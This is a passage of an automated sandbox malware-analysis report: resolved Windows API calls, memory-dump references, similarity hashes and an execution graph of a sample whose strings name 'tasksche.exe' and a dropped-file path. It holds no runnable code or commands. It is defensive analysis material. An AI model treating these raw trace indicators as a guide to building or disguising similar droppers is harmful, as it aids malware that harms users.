                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FB7FB10,?,00000000), ref: 00407CEF
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                                                              • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                                                              • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                                                              • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                                                              • sprintf.MSVCRT ref: 00407E01
                                                                                              • sprintf.MSVCRT ref: 00407E18
                                                                                              • MoveFileExA.KERNEL32 ref: 00407E2C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.764676146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000007.00000002.764645875.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764748473.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764783031.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764823734.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765009046.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765030422.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765070994.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
                                                                                              • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                                                              • API String ID: 4072214828-1507730452
                                                                                              • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                              • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                                                              • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                              • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:3.2%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:35
                                                                                              execution_graph 23822 41e9ce 23824 41e9da __calloc_impl 23822->23824 23823 41e9f2 23827 41ea00 23823->23827 23828 41a506 __getptd_noexit 69 API calls 23823->23828 23824->23823 23825 41eadc __calloc_impl 23824->23825 23826 41a506 __getptd_noexit 69 API calls 23824->23826 23826->23823 23829 41ea0e 23827->23829 23831 41a506 __getptd_noexit 69 API calls 23827->23831 23828->23827 23830 41ea1c 23829->23830 23832 41a506 __getptd_noexit 69 API calls 23829->23832 23833 41ea2a 23830->23833 23834 41a506 __getptd_noexit 69 API calls 23830->23834 23831->23829 23832->23830 23835 41a506 __getptd_noexit 69 API calls 23833->23835 23836 41ea38 23833->23836 23834->23833 23835->23836 23837 41a506 __getptd_noexit 69 API calls 23836->23837 23840 41ea46 23836->23840 23837->23840 23838 41a506 __getptd_noexit 69 API calls 23841 41ea57 23838->23841 23839 41efa3 __lock 69 API calls 23842 41ea5f 23839->23842 23840->23838 23840->23841 23841->23839 23843 41ea84 23842->23843 23844 41ea6b InterlockedDecrement 23842->23844 23858 41eae8 23843->23858 23844->23843 23845 41ea76 23844->23845 23845->23843 23848 41a506 __getptd_noexit 69 API calls 23845->23848 23848->23843 23849 41efa3 __lock 69 API calls 23850 41ea98 23849->23850 23851 41eac9 23850->23851 23852 42223c ___removelocaleref 8 API calls 23850->23852 23861 41eaf4 23851->23861 23856 41eaad 23852->23856 23855 41a506 __getptd_noexit 69 API calls 23855->23825 23856->23851 23857 422064 ___freetlocinfo 69 API calls 23856->23857 23857->23851 23864 41eec9 LeaveCriticalSection 23858->23864 23860 41ea91 23860->23849 23865 41eec9 LeaveCriticalSection 23861->23865 23863 41ead6 23863->23855 23864->23860 23865->23863 23870 41c7db 23873 41c7cb 23870->23873 23872 41c7e8 ctype 23876 420ed3 23873->23876 23875 41c7d9 23875->23872 23877 420edf __calloc_impl 23876->23877 23878 41efa3 __lock 69 API calls 23877->23878 23882 420ee6 23878->23882 23879 420f1f 23886 420f3a 23879->23886 23881 420f30 __calloc_impl 23881->23875 23882->23879 23883 420f16 23882->23883 23885 41a506 __getptd_noexit 69 API calls 23882->23885 23884 41a506 __getptd_noexit 69 API calls 23883->23884 23884->23879 23885->23883 23889 41eec9 LeaveCriticalSection 23886->23889 23888 420f41 23888->23881 23889->23888 22416 41e75f 22417 41e6ed __encode_pointer 7 API calls 22416->22417 22418 41e766 22417->22418 22419 40ddff 22420 40de0c __write_nolock 22419->22420 22421 40c3bf ctype 106 API calls 22420->22421 22422 40de20 22421->22422 22423 40bc16 _swprintf 103 API calls 22422->22423 22424 40de32 SetDlgItemTextW 22423->22424 22427 40d116 PeekMessageW 22424->22427 22428 40d131 GetMessageW TranslateMessage DispatchMessageW 22427->22428 22429 40d152 22427->22429 22428->22429 20336 40f58d 20337 40f597 __EH_prolog __write_nolock 20336->20337 20505 4060ee 20337->20505 20340 40f5d9 20346 40f5e3 20340->20346 20347 40f648 20340->20347 20368 40f5c2 20340->20368 20341 40fc0e 20342 40fc32 20341->20342 20343 40fc23 SendMessageW 20341->20343 20344 40fc4b 20342->20344 20345 40fc3b SendDlgItemMessageW 20342->20345 20343->20342 20590 40dbc1 20344->20590 20345->20344 20351 40f624 20346->20351 20352 40f5e6 20346->20352 20348 40f650 20347->20348 20349 40f6ce GetDlgItemTextW 20347->20349 20355 40c3bf ctype 106 API calls 20348->20355 20349->20351 20354 40f702 20349->20354 20358 40faa5 EndDialog 20351->20358 20351->20368 20357 40c3bf ctype 106 API calls 20352->20357 20352->20368 20359 40f719 GetDlgItem 20354->20359 20503 40f70a 20354->20503 20360 40f671 SetDlgItemTextW 20355->20360 20362 40f600 20357->20362 20358->20368 20363 40f753 SetFocus 20359->20363 20364 40f72d SendMessageW SendMessageW 20359->20364 20365 40f67d 20360->20365 20361 40fc82 GetDlgItem 20366 40fc98 20361->20366 20367 40fc9e SetWindowTextW 20361->20367 20511 4050e8 SHGetMalloc 20362->20511 20370 40f764 20363->20370 20384 40f770 20363->20384 20364->20363 20365->20368 20376 40f689 GetMessageW 20365->20376 20366->20367 20610 419cb2 GetClassNameW 20367->20610 20375 40c3bf ctype 106 API calls 20370->20375 20371 40fda7 EndDialog 20371->20368 20372 40fbb1 20378 40c3bf ctype 106 API calls 20372->20378 20381 40f76e 20375->20381 20376->20368 20377 40f69e IsDialogMessageW 20376->20377 20377->20365 20382 40f6ad TranslateMessage DispatchMessageW 20377->20382 20383 40fbc2 SetDlgItemTextW 20378->20383 20380 40f60f SetDlgItemTextW 20380->20368 20515 40d298 GetDlgItem 20381->20515 20382->20365 20386 40fbd5 20383->20386 20389 40c3bf ctype 106 API calls 20384->20389 20392 40c3bf ctype 106 API calls 20386->20392 20393 40f7a2 20389->20393 20390 40fce1 20395 40fd15 20390->20395 20399 40c3bf ctype 106 API calls 20390->20399 20391 40f7c4 20396 40f7d8 20391->20396 20524 40da8c 20391->20524 20397 40fbfa 20392->20397 20398 40bc16 _swprintf 103 API calls 20393->20398 20394 40e857 156 API calls 20394->20390 20407 40e857 156 API calls 20395->20407 20458 40fdc1 _wcscat 20395->20458 20530 40935f 20396->20530 20403 40c3bf ctype 106 API calls 20397->20403 20398->20381 20404 40fcf3 SetDlgItemTextW 20399->20404 20409 40fc01 MessageBoxW 20403->20409 20410 40c3bf ctype 106 API calls 20404->20410 20405 40f7f7 20536 419c88 SetCurrentDirectoryW 20405->20536 20406 40f7ec GetLastError 20406->20405 20413 40fd31 20407->20413 20408 40fe6a 20414 40fe73 EnableWindow 20408->20414 20415 40fe7d 20408->20415 20409->20368 20411 40fd07 SetDlgItemTextW 20410->20411 20411->20395 20417 40fd65 20413->20417 20421 40fd42 20413->20421 20414->20415 20418 40fe97 20415->20418 20654 4060ab GetDlgItem EnableWindow 20415->20654 20416 40f80c 20419 40f81e 20416->20419 20420 40f813 GetLastError 20416->20420 20423 40fdb4 20417->20423 20424 40fd6d SetForegroundWindow 20417->20424 20425 40fec2 20418->20425 20430 40feb4 SendMessageW 20418->20430 20431 40febc PostMessageW 20418->20431 20434 40f89b 20419->20434 20436 40f82f GetTickCount 20419->20436 20474 40f87f ctype 20419->20474 20420->20419 20639 419a9d ShowWindow 20421->20639 20426 40e857 156 API calls 20423->20426 20424->20423 20429 40fd7c 20424->20429 20425->20368 20432 40c3bf ctype 106 API calls 20425->20432 20426->20458 20428 40fe8e 20655 4060ab GetDlgItem EnableWindow 20428->20655 20429->20423 20438 40fd84 DialogBoxParamW 20429->20438 20430->20425 20431->20425 20444 40fed4 SetDlgItemTextW 20432->20444 20433 40fab4 20545 4060c9 GetDlgItem ShowWindow 20433->20545 20445 40f8b6 GetModuleFileNameW 20434->20445 20446 40fa4c 20434->20446 20442 40bc16 _swprintf 103 API calls 20436->20442 20438->20423 20443 40fda0 20438->20443 20439 40fe4a 20447 419a9d 91 API calls 20439->20447 20441 41a506 __getptd_noexit 69 API calls 20450 40fd64 20441->20450 20452 40f848 20442->20452 20443->20371 20444->20368 20632 40cffa 20445->20632 20449 40c3bf ctype 106 API calls 20446->20449 20453 40fe67 20447->20453 20448 40fac6 20546 4060c9 GetDlgItem ShowWindow 20448->20546 20455 40fa56 20449->20455 20450->20417 20537 408923 20452->20537 20453->20408 20460 40bc16 _swprintf 103 API calls 20455->20460 20457 40c3bf ctype 106 API calls 20457->20458 20458->20408 20458->20439 20458->20457 20459 40facf 20462 40c3bf ctype 106 API calls 20459->20462 20464 40fa74 20460->20464 20461 40bc16 _swprintf 103 API calls 20465 40f908 CreateFileMappingW 20461->20465 20467 40fad9 SetDlgItemTextW 20462->20467 20476 40c3bf ctype 106 API calls 20464->20476 20468 40f967 GetCommandLineW 20465->20468 20469 40f9cb ShellExecuteExW 20465->20469 20466 40f86d 20472 40f874 GetLastError 20466->20472 20466->20474 20547 4060c9 GetDlgItem ShowWindow 20467->20547 20470 40f977 20468->20470 20483 40f9e8 ctype 20469->20483 20636 40d212 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListW 20470->20636 20472->20474 20474->20433 20474->20434 20475 40faeb SetDlgItemTextW GetDlgItem 20479 40fb23 20475->20479 20480 40fb09 GetWindowLongW SetWindowLongW 20475->20480 20477 40fa8f MessageBoxW 20476->20477 20477->20351 20548 40e857 20479->20548 20480->20479 20481 40d212 3 API calls 20484 40f99f 20481->20484 20486 40fa22 20483->20486 20487 40f9fd WaitForInputIdle 20483->20487 20490 40d212 3 API calls 20484->20490 20494 40fa35 UnmapViewOfFile CloseHandle 20486->20494 20495 40fa47 20486->20495 20489 40fa0d 20487->20489 20488 40e857 156 API calls 20492 40fb3f 20488->20492 20489->20486 20493 40fa14 Sleep 20489->20493 20491 40f9ab MapViewOfFile 20490->20491 20497 40f9c8 _realloc 20491->20497 20578 40e2d7 20492->20578 20493->20486 20493->20489 20494->20495 20495->20351 20495->20446 20497->20469 20499 40e857 156 API calls 20500 40fb65 20499->20500 20501 40fb8b 20500->20501 20504 40e857 156 API calls 20500->20504 20638 4060ab GetDlgItem EnableWindow 20501->20638 20503->20371 20503->20372 20504->20501 20506 40611b 20505->20506 20508 4060f7 20505->20508 20676 40bbef 20506->20676 20509 406119 20508->20509 20656 40c15c 20508->20656 20509->20340 20509->20341 20509->20368 20512 405103 SHBrowseForFolderW 20511->20512 20514 4050ff 20511->20514 20513 405140 SHGetPathFromIDListW 20512->20513 20512->20514 20513->20514 20514->20368 20514->20380 20516 40d2c8 20515->20516 20517 40d2fa SendMessageW SendMessageW 20515->20517 20682 41918b 20516->20682 20519 40d34a SendMessageW SendMessageW SendMessageW 20517->20519 20520 40d32e 20517->20520 20522 40d394 SendMessageW 20519->20522 20523 40d376 SendMessageW 20519->20523 20520->20519 20522->20391 20523->20522 20526 40da99 __write_nolock 20524->20526 20525 40db11 20525->20396 20526->20525 20527 40dabe RegCreateKeyExW 20526->20527 20527->20525 20528 40dae4 _wcslen 20527->20528 20529 40daec RegSetValueExW RegCloseKey 20528->20529 20529->20525 20532 40936c __write_nolock _wcsncpy 20530->20532 20531 4093fb 20535 40941e 20531->20535 20685 4092c9 20531->20685 20532->20531 20534 4092c9 9 API calls 20532->20534 20532->20535 20534->20532 20535->20405 20535->20406 20536->20416 20538 408930 __write_nolock 20537->20538 20539 408991 20538->20539 20540 408997 CreateFileW 20538->20540 20541 4089df 20539->20541 20542 40a3dc 2 API calls 20539->20542 20540->20539 20541->20466 20543 4089c4 20542->20543 20543->20541 20544 4089c8 CreateFileW 20543->20544 20544->20541 20545->20448 20546->20459 20547->20475 20549 40e861 __EH_prolog __write_nolock 20548->20549 20550 40f431 20549->20550 20720 40d781 20549->20720 20550->20488 20553 40d781 ExpandEnvironmentStringsW 20568 40e896 _wcscat _wcslen _wcsrchr _wcscpy 20553->20568 20554 40ebb2 SetWindowTextW 20554->20568 20557 41a594 _realloc 74 API calls 20557->20568 20558 40ec50 RegOpenKeyExW 20559 40ec6c RegQueryValueExW RegCloseKey 20558->20559 20558->20568 20559->20568 20562 40e99e SetFileAttributesW 20564 40ea5c GetFileAttributesW 20562->20564 20566 40e999 _memset _wcslen 20562->20566 20563 41a506 __getptd_noexit 69 API calls 20563->20568 20564->20566 20567 40ea6a DeleteFileW 20564->20567 20566->20562 20566->20568 20570 40960e 7 API calls 20566->20570 20572 40bc16 _swprintf 103 API calls 20566->20572 20577 40ea38 SHFileOperationW 20566->20577 20737 40aa7d 20566->20737 20567->20566 20568->20550 20568->20553 20568->20554 20568->20557 20568->20558 20568->20563 20568->20566 20574 40eda7 SendMessageW 20568->20574 20724 411e60 CompareStringW 20568->20724 20725 40db16 20568->20725 20732 419c9b GetCurrentDirectoryW 20568->20732 20733 40960e 20568->20733 20742 409449 20568->20742 20745 40d92d 20568->20745 20570->20566 20573 40ea9c GetFileAttributesW 20572->20573 20573->20566 20575 40eaad MoveFileW 20573->20575 20574->20568 20575->20566 20576 40eac5 MoveFileExW 20575->20576 20576->20566 20577->20564 20579 40e2e1 _wcscpy __EH_prolog __write_nolock 20578->20579 20764 410d16 20579->20764 20581 40e312 _wcscpy 20768 40537e 20581->20768 20583 40e330 20772 407150 20583->20772 20587 40e383 20787 407074 20587->20787 20591 40dbce __write_nolock 20590->20591 22326 419e56 20591->22326 20594 40dcb1 GetDlgItem SendMessageW 20609 419c9b GetCurrentDirectoryW 20594->20609 20595 40dbdb GetWindow 20595->20594 20601 40dbf8 20595->20601 20596 40dc0d GetClassNameW 22331 411e60 CompareStringW 20596->22331 20598 40dc35 GetWindowLongW 20599 40dc96 GetWindow 20598->20599 20600 40dc45 SendMessageW 20598->20600 20599->20594 20599->20601 20600->20599 20602 40dc57 GetObjectW 20600->20602 20601->20594 20601->20596 20601->20598 20601->20599 22332 419e13 20602->22332 20604 40dc6c 20605 419dd0 3 API calls 20604->20605 22336 419ea0 20604->22336 20605->20604 20608 40dc8f DeleteObject 20608->20599 20609->20361 20611 419cd3 20610->20611 20612 419cf8 20610->20612 22353 411e60 CompareStringW 20611->22353 20613 40fcb0 20612->20613 20614 419cfd SHAutoComplete 20612->20614 20618 40e75f 20613->20618 20614->20613 20616 419ce6 20616->20612 20617 419cea FindWindowExW 20616->20617 20617->20612 20619 40e769 __EH_prolog __write_nolock 20618->20619 20620 401822 135 API calls 20619->20620 20621 40e78b 20620->20621 22354 401a1a 20621->22354 20626 41cf3e _malloc 69 API calls 20628 40e7d1 _realloc 20626->20628 20627 40e804 20630 40e813 20627->20630 20631 401228 ctype 133 API calls 20627->20631 20628->20627 20629 41a506 __getptd_noexit 69 API calls 20628->20629 20629->20627 20630->20390 20630->20394 20631->20630 20633 40d003 20632->20633 20634 40d01c 20632->20634 20635 40cfb9 126 API calls 20633->20635 20634->20461 20635->20634 20637 40d248 20636->20637 20637->20481 20638->20503 22402 419a36 LoadCursorW RegisterClassExW 20639->22402 20641 419ac7 GetWindowRect GetParent MapWindowPoints 20642 419b04 GetParent CreateWindowExW 20641->20642 20643 419afd DestroyWindow 20641->20643 20644 419b86 20642->20644 20648 419b49 20642->20648 20643->20642 20645 419b8a ShowWindow UpdateWindow 20644->20645 20646 419b9c 20644->20646 20645->20646 20653 40fd59 20646->20653 22409 4192d0 GetTickCount GetTickCount 20646->22409 20648->20653 22403 41947d 20648->22403 20651 419b68 ShowWindow SetWindowTextW 20652 41a506 __getptd_noexit 69 API calls 20651->20652 20652->20653 20653->20441 20654->20428 20655->20418 20679 40c075 20656->20679 20658 40c17b GetWindowRect GetClientRect 20659 40c258 20658->20659 20665 40c1bf 20658->20665 20660 40c2a1 GetSystemMetrics GetWindow 20659->20660 20661 40c263 GetWindowTextW 20659->20661 20671 40c2c5 20660->20671 20663 40bf1d ctype 104 API calls 20661->20663 20662 40c29c 20662->20660 20664 40c28a SetWindowTextW 20663->20664 20664->20660 20665->20662 20666 40c212 GetWindowLongW 20665->20666 20669 40c232 SetWindowPos GetWindowRect 20666->20669 20670 40c22b 20666->20670 20667 40c3a1 20667->20509 20668 40c2d2 GetWindowTextW 20668->20671 20669->20659 20670->20669 20671->20667 20671->20668 20672 40bf1d ctype 104 API calls 20671->20672 20673 40c383 GetWindow 20671->20673 20674 40c319 GetWindowRect SetWindowPos 20671->20674 20675 40c303 SetWindowTextW 20672->20675 20673->20667 20673->20671 20674->20673 20675->20671 20677 40bc13 20676->20677 20678 40bbf5 GetWindowLongW SetWindowLongW 20676->20678 20677->20509 20678->20677 20680 40bf1d ctype 104 API calls 20679->20680 20681 40c09c _wcschr 20680->20681 20681->20658 20683 40d2d3 ShowWindow SendMessageW SendMessageW 20682->20683 20684 419195 DestroyWindow 20682->20684 20683->20517 20684->20683 20686 4092d6 __write_nolock 20685->20686 20687 4092ff 20686->20687 20688 4092f6 CreateDirectoryW 20686->20688 20699 4092a5 20687->20699 20688->20687 20690 40932e 20688->20690 20692 409334 20690->20692 20695 40933d 20690->20695 20702 40908d 20692->20702 20693 409341 GetLastError 20693->20695 20695->20535 20696 40a3dc 2 API calls 20697 40931b 20696->20697 20697->20693 20698 40931f CreateDirectoryW 20697->20698 20698->20690 20698->20693 20710 409041 20699->20710 20703 41aaf0 __write_nolock 20702->20703 20704 40909a SetFileAttributesW 20703->20704 20705 4090b3 20704->20705 20706 4090dc 20704->20706 20707 40a3dc 2 API calls 20705->20707 20706->20695 20708 4090c7 20707->20708 20708->20706 20709 4090cb SetFileAttributesW 20708->20709 20709->20706 20718 41aaf0 20710->20718 20713 409062 20715 40a3dc 2 API calls 20713->20715 20714 409085 20714->20693 20714->20696 20716 409076 20715->20716 20716->20714 20717 40907a GetFileAttributesW 20716->20717 20717->20714 20719 40904e GetFileAttributesW 20718->20719 20719->20713 20719->20714 20721 40d78e __write_nolock 20720->20721 20722 40d822 ExpandEnvironmentStringsW 20721->20722 20723 40d845 20721->20723 20722->20723 20723->20568 20724->20568 20726 40db23 __write_nolock 20725->20726 20727 40dbbd GetDlgItem SetWindowTextW SendMessageW 20726->20727 20728 40db3f RegOpenKeyExW 20726->20728 20727->20568 20728->20727 20729 40db5c RegQueryValueExW 20728->20729 20730 40dbb4 RegCloseKey 20729->20730 20731 40db88 20729->20731 20730->20727 20731->20730 20732->20568 20735 40961f 20733->20735 20734 409476 7 API calls 20734->20735 20735->20734 20736 4096af 20735->20736 20736->20568 20738 40a0ea CharUpperW 20737->20738 20739 40aa92 20738->20739 20740 40bc16 _swprintf 103 API calls 20739->20740 20741 40aaa9 _wcslen _wcschr _wcsncpy 20739->20741 20740->20741 20741->20566 20743 409454 FindClose 20742->20743 20744 40945b 20742->20744 20743->20744 20744->20568 20746 40d93a __write_nolock 20745->20746 20747 41cf3e _malloc 69 API calls 20746->20747 20748 40d946 20747->20748 20752 40d957 _wcscat _wcslen _wcscpy 20748->20752 20753 4063ce 20748->20753 20750 40d781 ExpandEnvironmentStringsW 20750->20752 20751 40d9f7 20751->20568 20752->20750 20752->20751 20758 40635c 20753->20758 20755 4063d6 20756 4062fd RaiseException 20755->20756 20757 4063df 20756->20757 20757->20752 20761 401b9b 20758->20761 20760 406366 20760->20755 20762 41170e ctype 121 API calls 20761->20762 20763 401bb7 20762->20763 20763->20760 20765 410d23 _wcslen 20764->20765 20793 4011a7 20765->20793 20767 410d3b _wcscpy 20767->20581 20769 410d16 _wcslen 20768->20769 20770 4011a7 127 API calls 20769->20770 20771 410d3b _wcscpy 20770->20771 20771->20583 20773 40715a __EH_prolog 20772->20773 20803 41a89a 20773->20803 20776 4071b1 20778 4083c0 20776->20778 20779 4083cd __write_nolock 20778->20779 20784 408434 20779->20784 20904 4096bc 20779->20904 20781 4084dd 20781->20587 20783 408499 20783->20781 20786 406376 ctype 121 API calls 20783->20786 20784->20783 20785 4096bc 8 API calls 20784->20785 20881 40820b 20784->20881 20785->20784 20786->20781 20788 40707e __EH_prolog 20787->20788 20789 4155ef 133 API calls 20788->20789 20791 40709b ctype 20788->20791 20789->20791 20790 401001 ctype 133 API calls 20792 4070ae 20790->20792 20791->20790 20792->20499 20794 401211 20793->20794 20795 4011b9 20793->20795 20794->20767 20796 4011e2 20795->20796 20798 406423 ctype 121 API calls 20795->20798 20797 41a594 _realloc 74 API calls 20796->20797 20801 401202 20797->20801 20799 4011d8 20798->20799 20800 4063ce 122 API calls 20799->20800 20800->20796 20801->20794 20802 4063ce 122 API calls 20801->20802 20802->20794 20805 41a8a4 20803->20805 20804 41cf3e _malloc 69 API calls 20804->20805 20805->20804 20806 40719d 20805->20806 20807 41fc9b __calloc_impl 7 API calls 20805->20807 20809 41a8c0 20805->20809 20806->20776 20815 41768a 20806->20815 20807->20805 20808 41a8e6 20821 4125fa 20808->20821 20809->20808 20812 41c9cf __cinit 76 API calls 20809->20812 20812->20808 20813 41c77f __CxxThrowException@8 RaiseException 20814 41a8fe 20813->20814 20816 417694 __EH_prolog 20815->20816 20830 411072 20816->20830 20824 41d728 20821->20824 20825 412606 20824->20825 20826 41d748 _strlen 20824->20826 20825->20813 20826->20825 20827 41cf3e _malloc 69 API calls 20826->20827 20828 41d75b 20827->20828 20828->20825 20829 422896 _strcpy_s 69 API calls 20828->20829 20829->20825 20850 41a4dc 20830->20850 20832 41107c EnterCriticalSection 20833 41109f 20832->20833 20840 4110ba 20832->20840 20834 41a89a 77 API calls 20833->20834 20839 4110a5 20834->20839 20835 4110d0 20838 41a89a 77 API calls 20835->20838 20836 4110ff LeaveCriticalSection 20837 41110b 20836->20837 20846 4157db 20837->20846 20841 4110d6 20838->20841 20839->20840 20851 410f29 20839->20851 20840->20835 20840->20836 20843 4110ee LeaveCriticalSection 20841->20843 20845 410f29 125 API calls 20841->20845 20843->20837 20845->20843 20847 4157e8 _memset 20846->20847 20859 415724 20847->20859 20850->20832 20852 410f3b InitializeCriticalSection CreateSemaphoreW CreateEventW 20851->20852 20854 410f92 20852->20854 20855 410fb1 20854->20855 20856 406423 ctype 121 API calls 20854->20856 20855->20840 20857 410fa6 20856->20857 20858 406371 ctype RaiseException 20857->20858 20858->20855 20860 415730 _memset 20859->20860 20863 4152cd 20860->20863 20864 41530d 20863->20864 20865 4152da 20863->20865 20866 41533a 20864->20866 20867 414f64 69 API calls 20864->20867 20865->20864 20869 414f64 20865->20869 20866->20776 20867->20864 20872 413e66 20869->20872 20877 4129eb 20872->20877 20875 4129eb ctype 69 API calls 20876 413e79 20875->20876 20878 4129f1 20877->20878 20879 4129f7 20877->20879 20880 41a506 __getptd_noexit 69 API calls 20878->20880 20879->20875 20880->20879 20882 408215 __EH_prolog __write_nolock 20881->20882 20910 401822 20882->20910 20884 408232 20916 4088fd 20884->20916 20889 40825e 20891 408262 20889->20891 20895 408286 _wcscpy 20889->20895 20893 40826d 21039 401228 20893->21039 20895->20893 20905 4096d1 20904->20905 20909 4096d5 20905->20909 22314 409476 20905->22314 20907 4096e5 20908 4096ea FindClose 20907->20908 20907->20909 20908->20909 20909->20779 20911 40182c __EH_prolog 20910->20911 20912 41a89a 77 API calls 20911->20912 20914 4018b7 _memset 20911->20914 20913 4018a4 20912->20913 20913->20914 20915 40a026 128 API calls 20913->20915 20914->20884 20915->20914 20917 408908 20916->20917 20918 408249 20917->20918 21062 406510 20917->21062 20918->20893 20920 401417 20918->20920 20921 401421 __EH_prolog 20920->20921 20944 408e7b 127 API calls 20921->20944 20922 401444 20923 401465 20922->20923 20941 401449 _wcscpy 20922->20941 21068 406760 20922->21068 20926 40158e 20923->20926 20930 40159e 20923->20930 20927 406376 ctype 121 API calls 20926->20927 20927->20941 20929 40369f 158 API calls 20929->20930 20930->20929 20934 4015fb 20930->20934 20930->20941 20934->20941 20941->20889 20944->20922 21040 401232 __EH_prolog 21039->21040 21041 401261 ctype 21040->21041 22288 409ffc 21040->22288 21042 4129eb ctype 69 API calls 21041->21042 21043 401274 21042->21043 21045 4129eb ctype 69 API calls 21043->21045 21065 406459 21062->21065 21064 40651b 21064->20918 21066 40639f 121 API calls 21065->21066 21067 40646b 21066->21067 21067->21064 21071 401106 21068->21071 21072 40116f 21071->21072 21073 401118 21071->21073 22289 40a00c _memset 22288->22289 22290 4129eb ctype 69 API calls 22289->22290 22291 40a01a ctype 22290->22291 22291->21041 22315 409483 __write_nolock 22314->22315 22316 409505 FindNextFileW 22315->22316 22317 40949b FindFirstFileW 22315->22317 22319 409512 GetLastError 22316->22319 22320 409528 22316->22320 22318 4094b2 22317->22318 22325 4094e9 ___inittime 22317->22325 22321 40a3dc 2 API calls 22318->22321 22319->22320 22320->22325 22322 4094c2 22321->22322 22323 4094c6 FindFirstFileW 22322->22323 22324 4094de GetLastError 22322->22324 22323->22324 22323->22325 22324->22325 22325->20907 22327 419dd0 3 API calls 22326->22327 22328 419e5d 22327->22328 22329 40dbd3 22328->22329 22330 419e13 3 API calls 22328->22330 22329->20594 22329->20595 22330->22329 22331->20601 22333 419e42 22332->22333 22334 419e1c GetDC 22332->22334 22333->20604 22334->22333 22335 419e2b GetDeviceCaps ReleaseDC 22334->22335 22335->22333 22349 419e75 GetDC GetDeviceCaps ReleaseDC 22336->22349 22338 419eab 22339 419ec2 GetObjectW 22338->22339 22340 419eaf 22338->22340 22342 419ee7 22339->22342 22343 419ee9 CoCreateInstance 22339->22343 22350 419d0b GetDC CreateCompatibleDC CreateCompatibleDC GetObjectW 22340->22350 22342->22343 22344 419f0b _memset 22343->22344 22346 40dc7c SendMessageW 22343->22346 22345 419f81 CreateDIBSection 22344->22345 22344->22346 22345->22346 22347 419fce 22345->22347 22346->20599 22346->20608 22347->22346 22348 41a022 DeleteObject 22347->22348 22348->22346 22349->22338 22351 419d52 22350->22351 22352 419d55 9 API calls 22350->22352 22351->22352 22352->22346 22353->20616 22355 4088fd 121 API calls 22354->22355 22356 401a26 22355->22356 22357 401a2a 22356->22357 22358 401417 158 API calls 22356->22358 22363 401768 22357->22363 22359 401a37 22358->22359 22359->22357 22360 406376 ctype 121 API calls 22359->22360 22361 401a46 22360->22361 22362 408a32 123 API calls 22361->22362 22362->22357 22364 401772 __EH_prolog 22363->22364 22365 40117b 124 API calls 22364->22365 22370 401783 22364->22370 22366 401793 22365->22366 22367 40179e 22366->22367 22369 4017c4 22366->22369 22368 40369f 158 API calls 22367->22368 22368->22370 22374 403767 22369->22374 22370->20626 22370->20628 22376 40376d 22374->22376 22375 40369f 158 API calls 22375->22376 22376->22375 22377 4017e2 22376->22377 22377->22370 22378 4012ea 22377->22378 22379 4012f4 __EH_prolog 22378->22379 22380 402c8b 197 API calls 22379->22380 22381 401316 22380->22381 22382 40131a 22381->22382 22383 40132f 22381->22383 22385 41a506 __getptd_noexit 69 API calls 22382->22385 22387 401327 22382->22387 22395 4012b5 22383->22395 22385->22387 22387->22370 22390 411b3c MultiByteToWideChar 22391 401353 _wcslen 22390->22391 22392 4012d0 127 API calls 22391->22392 22393 40139f 22392->22393 22393->22387 22394 41a506 __getptd_noexit 69 API calls 22393->22394 22394->22387 22396 401106 127 API calls 22395->22396 22397 4012bf 22396->22397 22398 4012d0 22397->22398 22399 4012e2 22398->22399 22400 4012d9 22398->22400 22399->22390 22399->22391 22401 4011a7 127 API calls 22400->22401 22401->22399 22402->20641 22404 41948e _wcslen 22403->22404 22405 41cf3e _malloc 69 API calls 22404->22405 22408 419498 22405->22408 22406 4195f5 22406->20651 22406->20653 22407 411e81 CompareStringW 22407->22408 22408->22406 22408->22407 22410 4192f5 22409->22410 22411 41934a VariantInit 22410->22411 22413 41930e PeekMessageW 22410->22413 22412 41937a 22411->22412 22412->20653 22414 419341 GetTickCount 22413->22414 22415 419320 